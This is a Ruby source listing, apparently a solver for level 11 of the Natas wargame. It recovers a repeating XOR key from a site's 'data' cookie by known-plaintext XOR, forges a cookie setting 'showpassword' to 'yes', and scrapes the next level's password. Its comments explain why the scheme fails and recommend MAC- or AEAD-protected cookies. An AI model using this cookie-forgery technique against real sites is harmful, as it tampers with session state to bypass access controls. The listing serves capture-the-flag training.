class NatasLevel11

Level 11

Constants

DEFAULT_DATA
LEVEL
PAGE

Public Instance Methods

exec()
# File lib/natas.rb, line 349
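# Runs the level 11 solution against PAGE and reports the natas12 password.
#
# What the code does, step by step:
# 1. Fetches PAGE and reads the value of the `data` cookie from Set-Cookie.
# 2. XORs the Base64-decoded cookie with JSON.generate(DEFAULT_DATA). When the
#    cookie really is that JSON XORed with a repeating key, the result is the
#    key repeated over the cookie's length (known-plaintext recovery).
# 3. Reduces the repeated key to its shortest immediately-repeating prefix.
# 4. Re-encodes a copy of DEFAULT_DATA with 'showpassword' set to 'yes' and
#    sends it back as the `data` cookie.
#
# Security takeaway: a repeating-key XOR over content the client can predict
# gives the cookie neither confidentiality nor integrity. State the client must
# not alter belongs server-side, or in a cookie authenticated with a MAC or
# AEAD under a server-held key and verified before it is parsed.
#
# @return the value of found(...) on success; the value of not_found when the
#   password line is absent from the response body (assuming not_found returns
#   rather than raising -- it is defined outside this listing).
# @raise [NoMethodError] when the response carries no Set-Cookie header
# @raise [ArgumentError] when the cookie value is not strict Base64
def exec
  log("Getting the Cookie HTTP header from the page: #{PAGE}")
  response = get(PAGE)
  cookie = response['Set-Cookie']
  # The value is taken as everything between the first and second '='; Base64
  # padding arrives percent-encoded, hence the decode step.
  encoded = URI.decode_www_form_component(cookie.split('=')[1])
  log("Data: #{encoded}")

  log('Searching the XOR encryption key')
  # XOR is its own inverse: ciphertext ^ plaintext = key stream.
  key = xor_encrypt(
    Base64.strict_decode64(encoded),
    JSON.generate(DEFAULT_DATA)
  )
  log("Key found: #{key}")
  log('Searching a pattern of the key')
  # Grow a prefix one character at a time and stop as soon as the next slice of
  # the same length equals it. If no prefix repeats, the whole string is kept.
  # NOTE(review): a key stream that begins with two identical characters stops
  # this search after one character -- confirm that is acceptable here.
  pattern = String.new
  key.chars.each_with_index do |c, i|
    pattern << c
    break if pattern == key[(i + 1)..(i + pattern.length)]
  end
  log("Pattern found: #{pattern}")
  key = pattern

  # dup is a shallow copy, enough to avoid mutating the DEFAULT_DATA constant.
  payload = DEFAULT_DATA.dup
  payload['showpassword'] = 'yes'
  plaintext = JSON.generate(payload)
  log("Encrypting of new data: #{plaintext}")
  encrypted = xor_encrypt(plaintext, key)

  cookie_header = "data=#{Base64.strict_encode64(encrypted)}"
  log("Setting the new Cookie HTTP header: #{cookie_header}")
  log("Parsing the page: #{PAGE}")
  body = get(PAGE, { 'Cookie' => cookie_header }).body
  match = /The password for natas12 is (\w{32})<br>/.match(body)
  # Return here so a miss never reaches match[1] on nil.
  return not_found unless match

  found(match[1])
end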
xor_encrypt(data, key)
# File lib/natas.rb, line 341
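# XORs +data+ with +key+ byte by byte, repeating +key+ as often as needed.
#
# The operation is its own inverse: applying it twice with the same key returns
# the original bytes. It works on bytes rather than characters, so multi-byte
# (e.g. UTF-8) input round-trips instead of raising RangeError from Integer#chr
# or collapsing to a single byte.
#
# Repeating-key XOR is obfuscation, not encryption: anyone holding a ciphertext
# and the matching plaintext can recover the key with this same operation.
#
# @param data [String] bytes to transform
# @param key [String] key bytes; must be non-empty when +data+ is non-empty
# @return [String] binary (ASCII-8BIT) string with the same byte length as +data+
# @raise [ZeroDivisionError] when +key+ is empty and +data+ is not
def xor_encrypt(data, key)
  key_bytes = key.bytes
  data.each_byte.with_index.map { |byte, i| byte ^ key_bytes[i % key_bytes.length] }.pack('C*')
end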